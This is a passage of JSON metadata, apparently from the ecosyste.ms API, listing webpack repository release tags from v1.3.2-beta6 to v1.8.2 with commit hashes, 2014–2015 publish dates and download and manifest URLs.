2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G